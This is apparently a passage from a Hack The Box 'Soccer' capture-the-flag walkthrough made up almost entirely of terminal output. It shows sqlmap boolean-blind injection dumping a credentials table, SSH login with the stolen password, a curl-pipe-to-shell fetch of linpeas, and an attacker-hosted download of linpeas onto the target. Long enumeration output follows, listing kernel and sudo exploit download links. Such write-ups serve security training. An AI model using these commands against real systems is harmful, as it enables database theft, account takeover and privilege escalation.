retrieved: ql[13:44:45] [INFO] retrieved: information_schema[13:52:18] [INFO] retrieved: performance_schema[13:59:45] [INFO] retrieved: sys[14:01:13] [INFO] retrieved: soccer_db[14:05:20] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, soccer_db, sys'[14:05:20] [INFO] fetching number of tables for database 'soccer_db'[14:05:20] [INFO] retrieved: 1[14:05:41] [INFO] retrieved: accounts[14:09:06] [INFO] fetching number of tables for database 'mysql'[14:09:06] [INFO] retrieved: 37[14:09:51] [INFO] retrieved: c^C[*] ending @ 14:10:33 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.7.2#stable} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 14:10:49 /2023-03-19/[14:10:49] [INFO] resuming back-end DBMS 'mysql' [14:10:49] [INFO] testing connection to the target URL[14:10:54] [INFO] testing if the provided string is within the target URL page content[14:10:54] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[14:10:54] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[14:10:54] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 8[14:10:54] [INFO] fetching tables for database: 'soccer_db'[14:10:54] [INFO] fetching number of tables for database 'soccer_db'[14:10:57] [INFO] resumed: 1[14:10:57] [INFO] resumed: accountsDatabase: soccer_db[1 table]+----------+| accounts |+----------+[14:10:57] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'[*] ending @ 14:10:57 /2023-03-19/ ┌──(kwkl㉿kwkl)-[~]└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db -T accounts --dump-all ___ __H__ ___ ___[)]_____ ___ ___ {1.7.2#stable} |_ -| . [.] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 14:11:06 /2023-03-19/[14:11:07] [INFO] resuming back-end DBMS 'mysql' [14:11:07] [INFO] testing connection to the target URL[14:11:10] [INFO] testing if the provided string is within the target URL page content[14:11:10] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway[14:11:10] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6478 OR 1585=1585---[14:11:10] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 8[14:11:10] [INFO] sqlmap will dump entries of all tables from all databases now[14:11:10] [INFO] fetching tables for database: 'soccer_db'[14:11:10] [INFO] fetching number of tables for database 'soccer_db'[14:11:16] [INFO] resumed: 1[14:11:16] [INFO] resumed: accounts[14:11:16] [INFO] fetching columns for table 'accounts' in database 'soccer_db'[14:11:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:11:16] [INFO] retrieved: 4[14:11:40] [INFO] retrieved: email[14:13:50] [INFO] retrieved: id[14:14:51] [INFO] retrieved: password[14:18:12] [INFO] retrieved: username[14:21:37] [INFO] fetching entries for table 'accounts' in database 'soccer_db'[14:21:37] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'[14:21:37] [INFO] retrieved: 1[14:22:01] [INFO] retrieved: player@player.htb[14:29:32] [INFO] retrieved: 1324[14:31:45] [INFO] retrieved: PlayerOftheMatch2022[14:40:50] [INFO] retrieved: playerDatabase: soccer_dbTable: accounts[1 entry]+------+-------------------+----------------------+----------+| id | email | password | username |+------+-------------------+----------------------+----------+| 1324 | player@player.htb | PlayerOftheMatch2022 | player |+------+-------------------+----------------------+----------+[14:43:23] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kwkl/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'[14:43:23] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'[*] ending @ 14:43:23 /2023-03-19/try the ssh with using
username player
password PlayerOftheMatch2022
login successfully
try the linpeas.sh
From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
create the site
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ python3 -m http.server 3333Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...10.10.11.194 - - [19/Mar/2023 15:07:33] "GET /linpeas.sh HTTP/1.1" 200 -download it
We can execute it and get more and more info
player@soccer:~$ wget http://10.10.16.6:3333/linpeas.sh--2023-03-19 07:07:33-- http://10.10.16.6:3333/linpeas.shConnecting to 10.10.16.6:3333... connected.HTTP request sent, awaiting response... 200 OKLength: 828172 (809K) [text/x-sh]Saving to: ‘linpeas.sh’linpeas.sh 100%[===========================================================================================>] 808.76K 102KB/s in 8.4s 2023-03-19 07:07:43 (96.6 KB/s) - ‘linpeas.sh’ saved [828172/828172]player@soccer:~$ chmod +x linpeas.sh player@soccer:~$ ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022User & Groups: uid=1001(player) gid=1001(player) groups=1001(player)Hostname: soccerWritable folder: /dev/shm[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 Distributor ID: UbuntuDescription: Ubuntu 20.04.5 LTSRelease: 20.04Codename: focal╔══════════╣ Sudo version╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.8.31 ╔══════════╣ CVEs CheckVulnerable to CVE-2021-3560 Potentially Vulnerable to CVE-2022-2588╔══════════╣ PATH╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin╔══════════╣ Date & uptimeSun Mar 19 07:08:06 UTC 2023 07:08:06 up 20:03, 2 users, load average: 0.15, 0.03, 0.01╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)disk sdasda1sda2╔══════════╣ Unmounted file-system?╚ Check if you can mount umounted devices LABEL=cloudimg-rootfs / ext4 defaults 0 1 data /data vboxsf uid=1000,gid=1000,_netdev 0 0vagrant /vagrant vboxsf uid=1000,gid=1000,_netdev 0 0/dev/sda1 none swap sw 0 0proc /proc proc defaults,nodev,relatime,hidepid=2╔══════════╣ Environment╚ Any private information inside environment variables? LESSOPEN=| /usr/bin/lesspipe %s HISTFILESIZE=0USER=playerSSH_CLIENT=10.10.16.6 53816 22XDG_SESSION_TYPE=ttySHLVL=1MOTD_SHOWN=pamHOME=/home/playerSSH_TTY=/dev/pts/2DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/busLOGNAME=player_=./linpeas.shXDG_SESSION_CLASS=userTERM=xterm-256colorXDG_SESSION_ID=1391PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binXDG_RUNTIME_DIR=/run/user/1001LANG=C.UTF-8HISTSIZE=0LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:SHELL=/bin/bashLESSCLOSE=/usr/bin/lesspipe %s %sPWD=/home/playerSSH_CONNECTION=10.10.16.6 53816 10.10.11.194 22XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopHISTFILE=/dev/null╔══════════╣ Searching Signature verification failed in dmesg╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester╚ https://github.com/mzet-/linux-exploit-suggester [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: probable Tags: [ ubuntu=(20.04) ]{kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)[+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main[+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main[+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main[+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: probable Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)[+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154╔══════════╣ Executing Linux Exploit Suggester 2╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded.═╣ grsecurity present? ............ grsecurity Not Found═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... disabled ═╣ AppArmor profile? .............. unconfined═╣ User namespace? ................ enabled═╣ Cgroup2 enabled? ............... enabled═╣ Is ASLR enabled? ............... Yes═╣ Printer? ....................... No═╣ Is this a virtual machine? ..... Yes (vmware) ╔═══════════╗═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present/snap/bin/lxc ╔══════════╣ Am I Containered?╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No ╔═══════╗═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No═╣ AWS ECS? ............................. No═╣ AWS EC2? ............................. No═╣ AWS Lambda? .......................... No ╔════════════════════════════════════════════════╗════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes player 308476 0.0 0.1 10120 5328 pts/2 Ss 07:03 0:00 -bash player 308505 0.2 0.0 3664 2712 pts/2 S+ 07:07 0:00 _ /bin/sh ./linpeas.shplayer 311609 0.0 0.0 3664 1144 pts/2 S+ 07:08 0:00 _ /bin/sh ./linpeas.shplayer 311610 0.0 0.0 10612 3376 pts/2 R+ 07:08 0:00 | _ ps fauxwwwplayer 311611 0.0 0.0 3664 1144 pts/2 R+ 07:08 0:00 _ /bin/sh ./linpeas.shplayer 311613 0.0 0.0 3664 1144 pts/2 S+ 07:08 0:00 _ /bin/sh ./linpeas.shplayer 9262 0.0 0.1 10120 5380 pts/1 Ss+ 03:26 0:00 -bashplayer 9153 0.0 0.2 19116 9736 ? Ss 03:26 0:00 /lib/systemd/systemd --userplayer 11873 0.0 0.1 7108 4004 ? Ss 03:52 0:00 _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd Not Found ╔══════════╣ Cron jobs╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found-rw-r--r-- 1 root root 1040 Nov 28 22:08 /etc/crontab /etc/cron.d:total 24drwxr-xr-x 2 root root 4096 Nov 17 08:51 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all-rw-r--r-- 1 root root 712 Mar 27 2020 php-rw-r--r-- 1 root root 191 Nov 15 21:40 popularity-contest/etc/cron.daily:total 48drwxr-xr-x 2 root root 4096 Dec 1 18:14 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder-rwxr-xr-x 1 root root 376 Dec 4 2019 apport-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest-rwxr-xr-x 1 root root 214 Apr 25 2022 update-notifier-common/etc/cron.hourly:total 12drwxr-xr-x 2 root root 4096 Nov 15 21:39 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder/etc/cron.monthly:total 12drwxr-xr-x 2 root root 4096 Nov 15 21:39 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder/etc/cron.weekly:total 20drwxr-xr-x 2 root root 4096 Nov 15 21:40 .drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db-rwxr-xr-x 1 root root 403 Apr 25 2022 update-notifier-commonSHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin17 * * * * root cd / && run-parts --report /etc/cron.hourly25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )╔══════════╣ Systemd PATH╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Analyzing .service files╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services /etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path /etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative pathYou can't write on systemd PATH╔══════════╣ System timers╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sun 2023-03-19 07:09:00 UTC 29s left Sun 2023-03-19 06:39:00 UTC 29min ago phpsessionclean.timer phpsessionclean.service Sun 2023-03-19 11:19:55 UTC 4h 11min left Sat 2023-03-18 11:19:55 UTC 19h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.serviceSun 2023-03-19 13:38:42 UTC 6h left Sun 2023-03-19 06:52:17 UTC 16min ago ua-timer.timer ua-timer.service Sun 2023-03-19 14:28:28 UTC 7h left Sun 2023-03-19 04:18:49 UTC 2h 49min ago motd-news.timer motd-news.service Sun 2023-03-19 17:28:47 UTC 10h left Sat 2023-03-18 18:13:21 UTC 12h ago apt-daily.timer apt-daily.service Mon 2023-03-20 00:00:00 UTC 16h left Sat 2023-03-18 11:05:04 UTC 20h ago fstrim.timer fstrim.service Mon 2023-03-20 00:00:00 UTC 16h left Sun 2023-03-19 00:00:06 UTC 7h ago logrotate.timer logrotate.service Mon 2023-03-20 00:00:00 UTC 16h left Sun 2023-03-19 00:00:06 UTC 7h ago man-db.timer man-db.service Mon 2023-03-20 00:17:52 UTC 17h left Sun 2023-03-19 06:46:57 UTC 21min ago fwupd-refresh.timer fwupd-refresh.service Mon 2023-03-20 06:29:22 UTC 23h left Sun 2023-03-19 06:12:10 UTC 56min ago apt-daily-upgrade.timer apt-daily-upgrade.service Sun 2023-03-26 03:10:59 UTC 6 days left Sun 2023-03-19 03:10:07 UTC 3h 58min ago e2scrub_all.timer e2scrub_all.service n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service ╔══════════╣ Analyzing .timer files╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /snap/core20/1695/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket/snap/core20/1695/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog/snap/core20/1695/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket╔══════════╣ Unix Sockets Listening╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /org/kernel/linux/storage/multipathd/root/.pm2/pub.sock/root/.pm2/rpc.sock/run/dbus/system_bus_socket └─(Read Write)/run/irqbalance//irqbalance747.sock └─(Read )/run/irqbalance/irqbalance747.sock └─(Read )/run/lvm/lvmpolld.socket/run/mysqld/mysqld.sock └─(Read Write)/run/mysqld/mysqlx.sock └─(Read Write)/run/php/php7.4-fpm.sock/run/snapd-snap.socket └─(Read Write)/run/snapd.socket └─(Read Write)/run/systemd/fsck.progress/run/systemd/journal/dev-log └─(Read Write)/run/systemd/journal/io.systemd.journal/run/systemd/journal/socket └─(Read Write)/run/systemd/journal/stdout └─(Read Write)/run/systemd/journal/syslog └─(Read Write)/run/systemd/notify └─(Read Write)/run/systemd/private └─(Read Write)/run/systemd/userdb/io.systemd.DynamicUser └─(Read Write)/run/udev/control/run/user/1001/bus └─(Read Write)/run/user/1001/gnupg/S.dirmngr └─(Read Write)/run/user/1001/gnupg/S.gpg-agent └─(Read Write)/run/user/1001/gnupg/S.gpg-agent.browser └─(Read Write)/run/user/1001/gnupg/S.gpg-agent.extra └─(Read Write)/run/user/1001/gnupg/S.gpg-agent.ssh └─(Read Write)/run/user/1001/pk-debconf-socket └─(Read Write)/run/user/1001/snapd-session-agent.socket └─(Read Write)/run/user/1001/systemd/notify └─(Read Write)/run/user/1001/systemd/private └─(Read Write)/run/uuidd/request └─(Read Write)/run/vmware/guestServicePipe └─(Read Write)/var/run/mysqld/mysqld.sock └─(Read Write)/var/run/mysqld/mysqlx.sock └─(Read Write)/var/run/vmware/guestServicePipe └─(Read Write)/var/snap/lxd/common/lxd/unix.socket╔══════════╣ D-Bus config files╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus ╔══════════╣ D-Bus Service Objects list╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0- - - - - - -:1.1- - - - - - -:1.11 - - - - - - -:1.148 - - - - - - -:1.156 - - - - - - -:1.27 - - - - - - -:1.3- - - - - - -:1.4- - - - - - -:1.5- - - - - - -:1.6- - - - - - -:1.7- - - - - - -:1.8- - - - - - -:1.9- - - - - - -com.ubuntu.LanguageSelector - - - (activatable) - - -com.ubuntu.SoftwareProperties - - - (activatable) - - 